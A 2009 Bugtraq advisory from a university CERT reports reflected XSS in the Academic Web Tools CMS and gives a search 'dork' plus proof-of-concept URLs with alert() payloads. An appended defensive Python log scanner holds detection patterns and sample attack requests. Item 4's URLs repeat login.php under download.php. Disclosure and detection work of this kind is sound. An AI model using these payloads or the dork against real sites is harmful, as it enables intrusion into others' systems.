Message-ID: <20090301115813.25631.qmail@securityfocus.com>
Date: 1 Mar 2009 11:58:13 -0000
From: mr.faghani@...il.com
To: bugtraq@...urityfocus.com
Subject: YEKTA WEB Academic Web Tools CMS Multiple XSS

============================================
IUT-CERT
============================================
Title: Academic Web Tools CMS Multiple XSS
Vendor: www.yektaweb.com
Vulnerable Version: 1.5.7 and prior
Type: XSS
Fix: N/A
Dork: AWT YEKTA
============================================
nsec.ir
============================================

Description:
------------------
YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences, journals, etc. The built-in filter of this package cannot prevent XSS attacks on some parameters.

Vulnerabilities:
------------------
1- Cross Site Scripting (XSS) in "/page.php" in "sid", "logincase" and "redirect" parameters.
http://yoursite/page.php?sid=[XSS]
http://yoursite/page.php?logincase=[XSS]
http://yoursite/page.php?redirect=[XSS]

2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid", "logincase" and "redirect" parameters.
http://yoursite/page_arch.php?sid=[XSS]
http://yoursite/page_arch.php?logincase=[XSS]
http://yoursite/page_arch.php?redirect=[XSS]

3- Cross Site Scripting (XSS) in "/login.php" in "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

4- Cross Site Scripting (XSS) in "/download.php" in "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

Exploit/PoC:
------------------
Example:
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

Solution:
------------------
Input Validation Filter should be patched.

Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to: M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari
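
Since the advisory lists no fix, operators can at least watch for the pattern it describes. The following is an added example, not part of the original advisory or the vendor's code: a log check that flags requests to the four named scripts whose "sid", "logincase" or "redirect" value carries markup. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameters named in the advisory.
SCRIPTS = {"page.php", "page_arch.php", "login.php", "download.php"}
PARAMS = {"sid", "logincase", "redirect"}

# Markup and comment-closing sequences that have no place in these values.
SUSPICIOUS = re.compile(r"[<>\"']|\*/|-->")

# Assumption: combined log format, request field is "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2009:12:00:01 +0000] "GET /page.php?sid=1&slc_lang=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Mar/2009:12:00:07 +0000] "GET /login.php?slct_pg_id=53'
    '&sid=1*/--%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&slc_lang=fa HTTP/1.1" 200 4891',
    '192.0.2.44 - - [01/Mar/2009:12:00:09 +0000] "GET /awt/page_arch.php?slc_lang=fa'
    '&sid=1&logincase=%2A%2F--%3E HTTP/1.1" 200 4702',
    '192.0.2.51 - - [01/Mar/2009:12:00:12 +0000] "GET /search.php?redirect=%3Cb%3E HTTP/1.1" 200 1000',
]

def findings(line):
    """Return (script, parameter, decoded value) for each suspicious value in a line."""
    match = REQUEST.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    script = target.path.rsplit("/", 1)[-1]
    if script not in SCRIPTS:
        return []
    hits = []
    # parse_qsl percent-decodes once; unquote again to catch double encoding.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        decoded = unquote(value)
        if name in PARAMS and SUSPICIOUS.search(decoded):
            hits.append((script, name, decoded))
    return hits

def scan(lines):
    """Flatten findings over many log lines."""
    return [hit for line in lines for hit in findings(line)]

if __name__ == "__main__":
    for script, name, value in scan(SAMPLE_LOG):
        print(f"{script}: parameter {name!r} carries markup: {value!r}")
```

Only query-string parameters appear in access logs, so values submitted in a POST body are not covered by this check.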